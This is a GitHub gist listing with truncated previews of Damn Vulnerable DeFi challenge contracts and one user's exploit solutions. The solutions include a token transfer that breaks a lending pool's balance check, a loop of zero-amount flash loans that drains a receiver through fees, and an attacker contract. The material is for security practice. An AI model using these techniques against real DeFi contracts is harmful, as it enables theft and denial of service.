Juan Xavier Valverde JuanXavier
JuanXavier
/ ReceiverUnstoppable.sol
Created
July 8, 2022 23:40
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "../unstoppable/UnstoppableLender.sol"; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| contract ReceiverUnstoppable { | |
| UnstoppableLender private immutable pool; | |
| address private immutable owner; |
JuanXavier
/ UnstoppableLender.sol
Created
July 8, 2022 23:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import '@openzeppelin/contracts/token/ERC20/IERC20.sol'; | |
| import '@openzeppelin/contracts/security/ReentrancyGuard.sol'; | |
| interface IReceiver { | |
| function receiveTokens(address tokenAddress, uint256 amount) external; | |
| } |
JuanXavier
/ unstoppableSolution.js
Last active
July 9, 2022 00:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| await this.token.connect(attacker).transfer(this.pool.address, 1) | |
| console.log(' POOL BALANCE', String(await this.token.balanceOf(this.pool.address))) | |
| console.log('BALANCE BEFORE', String(await this.pool.poolBalance())) | |
| }) |
JuanXavier
/ DVT.sol
Created
July 9, 2022 01:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; | |
| contract DamnValuableToken is ERC20 { | |
| // Decimals are set to 18 by default in `ERC20` | |
| constructor() ERC20("DamnValuableToken", "DVT") { | |
| _mint(msg.sender, type(uint256).max); | |
| } |
JuanXavier
/ NaiveReceiverLenderPool.sol
Last active
July 9, 2022 20:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| contract NaiveReceiverLenderPool is ReentrancyGuard { | |
| using Address for address; | |
| uint256 private constant FIXED_FEE = 1 ether; // not the cheapest flash loan |
JuanXavier
/ FlashLoanReceiver.sol
Created
July 9, 2022 20:29
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| contract FlashLoanReceiver { | |
| using Address for address payable; | |
| address payable private pool; |
JuanXavier
/ SolutionNaive1.js
Created
July 9, 2022 20:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| /** CODE YOUR EXPLOIT HERE */ | |
| for (i = 1; i <= 10; i++) { | |
| await this.pool.connect(attacker).flashLoan(this.receiver.address, 0) | |
| console.log(i, String(await ethers.provider.getBalance(this.receiver.address))) | |
| } | |
| } |
JuanXavier
/ NaiveAttacker.sol
Created
July 9, 2022 21:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "../naive-receiver/NaiveReceiverLenderPool.sol"; | |
| contract NaiveAttacker { | |
| NaiveReceiverLenderPool public pool; | |
| constructor(address payable _pool) { | |
| pool = NaiveReceiverLenderPool(_pool); |
JuanXavier
/ SolutionNaive2.js
Last active
July 9, 2022 21:48
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| it('Exploit', async function () { | |
| /** CODE YOUR EXPLOIT HERE */ | |
| // Deploy attacker contract | |
| const NaiveAttacker = await ethers.getContractFactory('NaiveAttacker', attacker) | |
| this.attackerContract = await NaiveAttacker.deploy(this.pool.address) | |
| // Attack | |
| console.log( | |
| 'Receiver balance before attacking: ', | |
| String(await ethers.provider.getBalance(this.receiver.address)) |
JuanXavier
/ TrusterLenderPool.sol
Created
July 10, 2022 05:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| contract TrusterLenderPool is ReentrancyGuard { | |
| using Address for address; |
OlderNewer